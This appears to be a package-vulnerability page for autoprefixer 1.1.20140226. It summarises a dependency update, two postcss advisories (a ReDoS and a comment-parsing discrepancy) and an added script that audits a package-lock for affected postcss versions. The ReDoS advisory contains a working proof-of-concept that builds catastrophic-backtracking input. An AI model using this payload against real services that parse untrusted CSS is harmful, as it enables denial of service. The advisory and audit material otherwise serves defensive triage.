The autoprefixer package, a tool crucial for modern web development, saw a minor version update from 1.1.20140222 to 1.1.20140226 in February 2014. Both versions share the core functionality of parsing CSS and automatically adding vendor prefixes, ensuring cross-browser compatibility based on data from the Can I Use website. This significantly eases the burden on developers, allowing them to write clean, standard CSS without manually managing browser-specific prefixes.
Key dependencies like postcss for CSS parsing and fs-extra for file system operations remained consistent between the two releases, indicating a stable foundation. However, the update primarily involved changes in the devDependencies section. Notably, the should assertion library was bumped from version 3.1.2 to 3.1.3, and browserify, the browser-side CommonJS module bundler, saw an upgrade from 3.30.2 to 3.31.2. While seemingly minor, these development dependency updates suggest improvements in the testing and build process of autoprefixer itself. Although the core parsing logic and browser support remained largely unchanged, these upgrades likely addressed internal bug fixes, performance enhancements, or compatibility improvements within the development environment, ultimately contributing to a more robust and reliable tool for end-users. Developers using these tools in their workflow can enjoy enhancements in terms of developer experience, since autoprefixer relies on them.
All vulnerabilities related to version 1.1.20140226 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds a stylesheet that repeats the sourceMappingURL annotation n times
// without ever closing the comment, which is what drives the backtracking.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm up the parser with a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Time the parse for inputs of growing length; the cost grows superlinearly
// on affected versions.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
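Both advisories above are fixed purely by moving to a patched postcss release, so the practical check for a project that pins autoprefixer 1.1.x is to find every copy of postcss in the dependency tree and compare it against the affected ranges. The following is an added example, not code from the advisories or from the postcss or autoprefixer projects. It implements a small semver comparison (no third-party semver package) and audits a constructed package-lock.json object. It assumes that the upper bound of each range quoted on this page (7.0.36, 8.2.13, 8.4.31) is the fixed release and is therefore excluded, and it ignores pre-release suffixes when comparing.

```javascript
// Added example (not from the advisories or from postcss/autoprefixer):
// triage postcss versions against the affected ranges quoted on this page.

// Parse "MAJOR.MINOR.PATCH"; a leading "v" and a "-prerelease" suffix are
// accepted but the suffix is ignored for the comparison (assumption).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-[0-9A-Za-z.-]+)?$/.exec(String(v).trim());
  if (!m) throw new Error(`not a semver version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Numeric comparison per component, so 8.10.0 sorts after 8.9.9.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Affected ranges as stated in the advisory text on this page. Assumption:
// `max` is the fixed release and is excluded; `min: null` means no lower bound.
const POSTCSS_ADVISORIES = [
  {
    title: "Regular Expression Denial of Service in postcss",
    ranges: [
      { min: null, max: "7.0.36" },
      { min: "8.0.0", max: "8.2.13" },
    ],
  },
  {
    title: "PostCSS line return parsing error",
    ranges: [{ min: null, max: "8.4.31" }],
  },
];

function inRange(version, range) {
  if (range.min !== null && compareVersions(version, range.min) < 0) return false;
  return compareVersions(version, range.max) < 0;
}

// Titles of the advisories on this page that apply to `version`.
function affectedAdvisories(version) {
  return POSTCSS_ADVISORIES
    .filter((adv) => adv.ranges.some((r) => inRange(version, r)))
    .map((adv) => adv.title);
}

// Walk the "packages" map of a parsed package-lock.json (lockfileVersion 2/3)
// and report every postcss copy, nested ones included, that is affected.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (!path.endsWith("node_modules/postcss") || !entry.version) continue;
    const hits = affectedAdvisories(entry.version);
    if (hits.length) findings.push({ path, version: entry.version, advisories: hits });
  }
  return findings;
}

// Constructed sample lockfile: the top-level copy is patched, but a nested
// copy pulled in under autoprefixer is still in both affected ranges.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "node_modules/postcss": { version: "8.4.31" },
    "node_modules/autoprefixer/node_modules/postcss": { version: "8.2.12" },
  },
};

console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
```

The nested-copy case is the one worth the extra lines: `npm ls postcss` style checks that look only at the top-level entry would report the project as patched while the copy autoprefixer actually loads is still affected. To run it against a real project, replace SAMPLE_LOCK with `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))`.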